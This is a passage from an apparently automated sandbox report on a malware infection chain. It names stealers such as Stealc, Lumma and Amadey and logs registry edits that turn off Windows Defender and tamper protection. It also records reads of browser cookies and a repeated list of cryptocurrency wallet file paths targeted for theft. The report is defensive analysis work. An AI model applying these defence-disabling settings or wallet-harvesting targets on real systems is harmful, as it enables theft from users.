Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001527001\yxrd0ob7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001527001\yxrd0ob7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001567001\hhnjqu9y.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001567001\hhnjqu9y.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001588001\efbc18aa93.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001588001\efbc18aa93.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001589001\109418c5c3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001589001\109418c5c3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001590001\51a08c3032.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001590001\51a08c3032.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001591001\2bbdb01603.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001591001\2bbdb01603.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_009ECB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_009ECB1A

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006A7850 GetProcessHeap,HeapAlloc,GetUserNameA,

7_2_006A7850

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006A7A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

7_2_006A7A30

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: new_v8.exe, 0000001E.00000003.3097750570.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s%\Windows Defender\MsMpeng.exe
Source: new_v8.exe, 0000001E.00000003.3097210992.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3097027296.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4144934066.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 6.2.axplong.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2126506859.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2121371600.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2080542129.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2086147966.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2617632587.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2056584594.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2096834409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match	File source: 0000001F.00000003.3795915109.000000000E2DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3795915109.000000000E30E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3795884336.0000000001767000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3384717218.0000000001763000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3795777106.000000000E30E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JavUmar.exe PID: 4712, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3288f0a855.exe PID: 6676, type: MEMORYSTR

Yara detected Socks5Systemz

Source: Yara match	File source: 00000027.00000002.4847975543.0000000002EC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.4844229093.0000000002E16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: blurayplayer32.exe PID: 2824, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 7.2.stealc_default2.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.stealc_default2.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.2682479773.00000000006AE000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2682444878.0000000000691000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5004, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stealc_default2[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5004, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
